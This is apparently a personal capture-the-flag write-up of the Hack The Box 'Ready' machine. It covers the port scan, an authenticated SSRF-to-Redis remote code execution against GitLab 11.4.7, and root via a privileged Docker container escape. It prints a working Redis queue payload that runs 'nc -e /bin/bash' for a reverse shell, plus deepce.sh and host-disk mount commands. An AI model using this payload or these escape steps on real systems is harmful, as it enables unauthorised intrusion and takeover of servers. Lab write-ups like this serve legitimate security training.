IP-ADDR: ready.htb
nmap scan:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://ready.htb:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Port 5080 running service nginx http server
Running gitlab instance Version CE 11.4.7 get in help section after register with new user
Searching for gitlab exploit on exploitDB
❯ searchsploit gitlab 11.4.7
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
GitLab 11.4.7 - RCE (Authenticated) (2) | ruby/webapps/49334.py
GitLab 11.4.7 - Remote Code Execution (Authen | ruby/webapps/49257.py
---------------------------------------------- ---------------------------------
- Blog on GitLab 11.4.7 Remote Code Execution from https://liveoverflow.com/
liveoverflow explain in his blog AWA in youtube video
Verify ssrf
Using IPv6 address to bypass the filter on localhost.
and it worked
Got Payload form bug reported by Jobert Abma hacker1 report
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash 4141\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
url encoded from url-encode-decode.com
❯ python payload-gen.py #Scripting left on payload generating becaouse for some reason gitlab returning 422 error on every request outside chromium browser.
Port: 4141
Intercept "project import" request replace import url with paylad.
- Inside docker container
[*] ctn000 Are we in a docker container?................................... yes!
... [snip] ...
-rwxr-xr-x 1 root root 0 Dec 1 12:41 /.dockerenv
Container's root password floting in /
root directory but password is not working.
Found gitlab config file backup in /opt/backup/
directory and password.
and password work for container root
Now running deepce.sh script found Privileged Mode enable.
[+] Privileged Mode ......... Yes
Exploit docker Privileged Mode with deepce script
./deepce.sh --no-enumeration --exploit PRIVILEGED -cmd 'hostname' -q
The --privileged
(Privileged Mode) flag allows the container to have access to the host devices. So container root user can mount host.
Privileged Mode allow continer root to run fdisk on host.
(remote) [email protected]:/tmp$ fdisk -l
... [snip] ...
Device Start End Sectors Size Type
/dev/sda1 2048 4095 2048 1M BIOS boot
/dev/sda2 4096 37746687 37742592 18G Linux filesystem
/dev/sda3 37746688 41940991 4194304 2G Linux swap
Host is in /dev/sda2
mounting host in the comtainer
mkdir /tmp/host
mount /dev/sda2 /tmp/host
wc -c /tmp/host/root/root.txt
finally root shell with deepce script